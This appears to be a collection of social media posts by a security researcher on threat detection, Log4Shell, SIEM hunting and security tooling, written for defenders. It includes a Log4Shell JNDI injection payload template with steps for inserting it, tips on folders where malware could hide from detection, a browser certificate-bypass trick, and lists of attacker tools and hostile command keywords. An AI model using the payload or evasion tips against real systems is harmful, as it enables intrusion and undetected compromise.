I've decided to put a screenshot showing the hex editor view of a Turla Kazuar sample behind acrylic glass on my desk to always remind me, why I am doing all this ...
because I 💛 to be a pain in the neck of the bad guys
How to test your apps for
#log4shell
vulnerability
1. Generate a DNS token
2. Wrap that token in
Prefix: ${jndi:ldap://
Suffix: /a}
3. Use that value in search forms, profile data, settings etc. of your apps
4. Get notified when you triggered a reaction
Can we get a Kitchen Nightmares but with IT departments and a cyber Gordon Ramsey that shouts at people for not having an asset inventory, log or vulnerability management?
I would love that 🖤
First security application I install on ...
macOS: LittleSnitch
Linux Server: Fail2ban
Linux Workstation: etckeeper
Windows Workstation: GlassWire
Windows Server: Sysmon
---
What are yours?
People use "grep" after "cat" as it allows for a quicker alteration of the searched keyword, enhancing their workflow.
By simply pressing the arrow up, they can easily edit the last command and quickly change the search keyword, which is a lot more efficient than navigating
InfoSec professional life cycle
20y-30y
Uh, someone found a vuln!
30y-40y
I've found a vuln!
40y-50y
I can detect / protect you from vulns!
50y-60y
Chinese threat actor has found vuln faster than you!
60y+
I breed chicken and cultivate orange trees
If you're an attacker with local admin privs, consider storing your malicious files in
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection
MS tends to store noisy and shady scripts there, leading many security vendors to eventually exclude that folder
A DFIR friend told me that one of his customers, which spent a full week finding & remediating log4j vulnerabilities got ransomed through an unpatched Confluence vulnerability that was published in August
#Log4j
#Log4Shell
The problem in IT security is that fascinating things are often unnecessary while boring things are usually essential.
We focus too much on the fancy stuff and can't get the fundamental things right.
Detect suspicious keyboard layout loads with this
#Sysmon
config & Sigma rule
> Example: Allows you to detect CN 🇨🇳, VN 🇻🇳, IR 🇮🇷 remote users that connect to your servers maintained by US 🇺🇸 staff only
Sysmon Config
Sigma Rule
No1 reason why people don't publish their code
Me: Ah, that's a useful tool. Do you plan to publish this?
Him: No, why should I?
Me: Others face the same problems.
Him: They would only laugh at my shitty code - I'll refactor it.
And that never happens.
TIL whenever you see an SSL certificate error and the browser doesn't let you continue - even on your own risk, you can just type 'thisisunsafe' to bypass the protection
After years in security monitoring, detection engineering, training ML models and writing detections, you'll learn one thing:
The problem isn't that malware tries to look like legitimate software, it's that software does a lot of things that you'd only expect from malware
Imagine you'd get access to an unknown SIEM of a new customer & would be given 10min to find malicious activity by using keyword searches on raw data, what would you search for?
I'll start
'.dmp full'
'whoami'
'delete shadows'
'FromBase64String'
'save HKLM\SAM'
' -w hidden '
It's not always possible to scan every device in your network for crypt mining malware (Linux boxes, IOT, App containers)
But you could check your DNS & firewall logs for connections to the limited number of mining pools
I've compiled a list for you
There is Base64 encoded malicious stuff that one sees very frequently
I made a cheat sheet for us so that we can learn and spot malicious stuff faster ⚡️
The sad truth about work is that 97% of the victims don’t have a blue team, no SIEM, no SOC and don’t monitor Twitter for new threats
They have an admin or IT service provider that manages users, mail boxes, installs printers & once in a while a new AV
If I were evil, I wouldn’t attack 20-30 target companies in expensive campaigns but instead the developers of Ublock, Notepad++ and Putty to own the whole world
Linus is the Gordon Ramsay of the Linux Kernel. I‘d love to watch a show called „Kernel Nightmares“ in which he yells at developers „What is this? Look at this crap!“ „The socket is raw!“ „Close it down!“ „that was an idiot branch switch“
Give me a list of well known tools used by adversaries
Novice:
nmap, Cain, hydra, tcpdump, arpspoof
Intermediate:
Htran, Mimikatz, smbexec, Lazagne, PwDump
Expert:
PowerShell, VBA macros, JavaScript, WMI, certutil, legitimate signed executables
Nephew asks: How did you get the source code from these old magazines, when there were no link under the article to download it? Github isn't that old, is it?
Me: We read it and typed it.
He: *big eyes*
Me: Yes, all of it.
What people seem to miss:
The
#Log4Shell
vulnerability isn't just a RCE 0day.
It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products.
It's a 0day cluster bomb.
@stillgray
What always baffles me is that everyone "deserves" to live a certain way or get something, but what about the people who have earned their salary but don't get it because they were forced to pay for the things that others "deserve"?
Log4Shell Detector v0.1
Python based scanner that tries to detect even the most obfuscated versions of the exploit code
- first version: I did a few tests, not more
- please provide pull requests with improvements
HardenTools
a collection of simple utilities designed to disable a number of "features" exposed by Microsoft Windows
> I've just had a chat with s/o who hasn't heard of it and thought, now that Win11 is out, I should share it again
If I'd write malware, I'd drop it into
\AppData\Local\Microsoft\TeamsMeetingAddin\
- user has write access
- probably excluded from some detections
- SOC analyst: 'ah, just another MS Teams quirk. we've seen so many.'
- availability has top priority ;)
Just got asked for a list of cybersecurity certifications
I always point people to this specific website for that, and typically, their response is a solid "wtf"
Find evidence of log4j usage on Linux servers with these 3 commands
ps aux | egrep '[l]og4j'
find / -iname "log4j*"
lsof | grep log4j
Find places to which your applications write logs
lsof | grep '\.log'
#log4shell
#log4j
Log Sources
- ordered by priority
- with ratings in different categories
- personal and highly subjective assessment
- from my most recent slide deck on low hanging fruits in security monitoring
#SIEM
#SecurityMonitoring
#ThreatHunting
Idea: Microsoft should reactivate clippy to help sysadmins with the newest threats that won't be fixed with a KB patch but require admins to find, read, understand and apply advisories
Clippy could ask questions like these:
What would a time traveller from the year 2005 think if he heard that the software used in 95% of todays attacks is sold by a legal company registered in the US?
What would you think of it if it were registered in Russia?
APT Simulator
A toolset to make a system look as if it was the victim of an APT attack
> quick & dirty & batch, but a better adversary simulation than Nmap+Cain+EICAR
Haha .. I did it .. Raccine - a simple Ransomware Vaccine
- uses debugger registration to intercept vssadmin.exe invocations
- collects process tree pids for kills
- PoC as weekend project
- my C code sucks, but it works
The best way to learn how real threat actors operate is to read the many published threat reports on their activity
DFIR Report
APT Groups and Operations
ORKL
I’ll add more links in the replies 🧵
My Signature Creation Mind Map
Input: Sample
> the things that I check to create YARA signatures, Sigma rules or IOCs
> or pivot to related samples in order to improve the signatures / rules
I have a special Christmas present for you guys 🎁
I took the time this morning & completely reworked my 'God Mode YARA Rule'
It's a PoC aimed at crafting a single rule that covers a vast array of threats with minimal FPs
Merry Christmas to you all 🎄